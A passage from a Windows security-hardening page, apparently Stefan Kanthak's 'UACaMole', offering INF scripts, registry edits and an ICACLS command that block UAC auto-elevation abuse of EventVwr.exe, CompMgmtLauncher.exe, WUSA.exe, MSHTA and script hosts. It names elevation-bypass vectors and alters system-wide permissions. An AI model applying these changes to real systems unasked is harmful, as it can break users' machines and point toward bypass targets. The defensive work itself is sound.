HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CompMgmtLauncher.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64
processor architectures is left as an exercise to the reader.
Caveat: NEVER use the implementation-defined reserved Registry (sub)keys
WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in
the proper execution environment!
Note: always specify complete command lines in Registry entries, not just the
name of a data or script file, and always use fully qualified pathnames!
MITIGATION AGAINST EXPLOITATION OF EVENTVWR.EXE
Replace the command line of the verb Open for Event Log files which launches the
superfluous EventVwr.exe and additionally inhibit its elevation:
; Copyright © 2009-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
[Version]
Provider = "Stefan Kanthak"
Signature = "$Windows NT$"
[DefaultInstall]
AddReg = Registry
[Registry]
HKCR,"evtfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""
HKCR,"evtxfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\EventVwr.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64
processor architectures is left as an exercise to the reader.
Caveat: NEVER use the implementation-defined reserved Registry (sub)keys
WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in
the proper execution environment!
Note: always specify complete command lines in Registry entries, not just the
name of a data or script file, and always use fully qualified pathnames!
MITIGATIONS AGAINST EXPLOITATION OF .NET FRAMEWORK PROFILER
Use an unprivileged Standard User account!
Additionally use AppLocker or Software Restriction Policies alias SAFER. to deny
execution of DLLs from user-writable directories.
MITIGATIONS AGAINST EXPLOITATION OF HTML HELP
Use an unprivileged Standard User account!
Additionally use AppLocker or Software Restriction Policies alias SAFER. to deny
execution of DLLs from user-writable directories.
MITIGATIONS AGAINST EXPLOITATION OF VULNERABLE SHORTCUTS IN THE START MENU
Replace the command line of the shortcuts:
; Copyright © 2009-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
[Version]
Provider = "Stefan Kanthak"
Signature = "$Windows NT$"
[DefaultInstall]
ProfileItems = Shortcut
[Shortcut]
CmdLine = 16421,,"MMC.exe %16421%\TaskSchd.msc"
;HotKey =
IconIndex = 1
IconPath = 16421,,"MIGUIResource.dll"
InfoTip = "@%16421%\MIGUIResource.dll,-202"
Name = "Task Scheduler",0
SubDir = "Accessories\System Tools"
;WorkingDir = 16421,
Note: creation of safe shortcuts to the various other *.msc found in the
directory %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative
Tools\ is left as an exercise to the reader.
Note: always specify complete command lines in shortcuts, not just the name of a
data or script file, and always use fully qualified pathnames!
MITIGATION AGAINST EXPLOITATION OF WUSA.EXE
Inhibit its elevation:
; Copyright © 2009-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
[Version]
Provider = "Stefan Kanthak"
Signature = "$Windows NT$"
[DefaultInstall]
AddReg = Registry
[Registry]
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WUSA.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64
processor architectures is left as an exercise to the reader.
Caveat: NEVER use the implementation-defined reserved Registry (sub)keys
WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in
the proper execution environment!
MITIGATION AGAINST EXPLOITATION OF MSHTA.EXE, CSCRIPT.EXE AND WSCRIPT.EXE
Inhibit their elevation:
; Copyright © 2009-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
[Version]
Provider = "Stefan Kanthak"
Signature = "$Windows NT$"
[DefaultInstall]
AddReg = Registry
[Registry]
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\MSHTA.exe",2,"RunAsInvoker"
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CScript.exe",2,"RunAsInvoker"
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WScript.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64
processor architectures is left as an exercise to the reader.
Caveat: NEVER use the implementation-defined reserved Registry (sub)keys
WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in
the proper execution environment!
MITIGATIONS AGAINST COMPOUND VULNERABILITIES
Use an unprivileged Standard User account!
Set the UAC slider to its highest position titled Always notify:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000002
;"ConsentPromptBehaviorUser"=dword:00000000
Additionally deny execution (for unprivileged users) in all user-writable
subdirectories below %SystemRoot%\, for example via AppLocker or Software
Restriction Policies alias SAFER.
Finally remove the permission for unprivileged users (really: members of the NT
AUTHORITY\Authenticated Users or BUILTIN\Users groups) to create subdirectories
in the root directory of the system drive:
ICACLs.exe %SystemDrive%\ /Deny *S-1-5-32-545:(AD,WD) /Remove:d *S-1-5-32-545 /Remove:g *S-1-5-11
Disable the Diagnostics Troubleshooting Wizard:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics]
"EnableDiagnostics"=dword:00000000
ALTERNATIVE MITIGATION
Launch an arbitrary other application instead of the superfluous
CompMgmtLauncher.exe:
; Copyright © 2016-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
[Version]
Provider = "Stefan Kanthak"
Signature = "$Windows NT$"
[DefaultInstall]
AddReg = Registry
[Registry]
HKLM,"SOFTWARE\Microsoft\Windows NT\Image File Execution Options\CompMgmtLauncher.exe","Debugger",0,"%16420%\.exe"
Download the Vulnerability and Exploit Detector SENTINEL.EXE and save it as
%SystemRoot%\.exe.
Note: addition of the Registry entries for the AMD64 alias x64 and IA64
processor architectures as well as EventVwr.exe is left as an exercise to the
reader.
Caveat: NEVER use the implementation-defined reserved Registry (sub)keys
WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in
the proper execution environment!
INSTALLATION
Download the setup script UACAMOLE.INF, then right-click to display its context
menu and click Install to run the installation.
Installation requires administrative privileges and access rights.
Note: on Windows Vista and newer versions of Windows NT, InfDefaultInstall.exe,
the application registered for the Install verb of *.inf files, requests
administrative privileges.
Note: on systems with AMD64 alias x64 processor architecture, the installation
must be run in the native (64-bit) execution environment!
UPDATE
The setup script supports the update from any previous version: just install the
current version!
DEINSTALLATION
Not provided.
TRIVIA
UACaMole is pronounced like Whack-a-Mole.
CONTACT
If you miss anything here, have additions, comments, corrections, criticism or
questions, want to give feedback, hints or tipps, report broken links, bugs,
deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings,
vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to
ask, comment, criticise, flame, notify or report!
Use the X.509 certificate to send S/MIME encrypted mail.
Note: email in weird format and without a proper sender name is likely to be
discarded!
I dislike HTML (and even weirder formats too) in email, I prefer to receive
plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.
TERMS AND CONDITIONS
By using this site, you signify your agreement to these terms and conditions. If
you do not agree to these terms and conditions, do not use this site!
* The software and the documentation on this site are provided as is without
any warranty, neither express nor implied.
In no event will the author be held liable for any damage(s) arising from the
use of the software or the documentation.
* Permission is granted to use the current version of the software and the
current version of the documentation solely for personal private and
non-commercial purposes.
An individuals use of the software or the documentation in his or her
capacity or function as an agent, (independent) contractor, employee, member
or officer of a business, corporation or organisation (commercial or
non-commercial) does not qualify as personal private and non-commercial
purpose.
* Without written approval from the author the software or the documentation
must not be used for a business, for commercial, corporate, governmental,
military or organisational purposes of any kind, or in a commercial,
corporate, governmental, military or organisational environment of any kind.
* Redistribution of the software and the documentation is allowed only in
unmodified form of its current version and free of charge.
DATA PROTECTION DECLARATION
This web page records no (personal) data and stores no cookies in the web
browser.
The web service is operated and provided by
Telekom Deutschland GmbH
Business Center
D-64306 Darmstadt
Germany
<hosting@telekom.de>
+49 800 5252033
The web service provider stores a session cookie in the web browser and records
every visit of this web site with the following data in an access log on their
server(s):
* the (pseudonymised) IP address;
* the date and time of the request;
* the URL of the requested web page or file;
* the Referer and User-Agent HTTP headers sent by the web browser;
* the result (success or failure) of the request;
* the amount of data received and sent.
--------------------------------------------------------------------------------
Copyright © 1995–2022 • Stefan Kanthak • <stefan.kanthak@nexgo.de>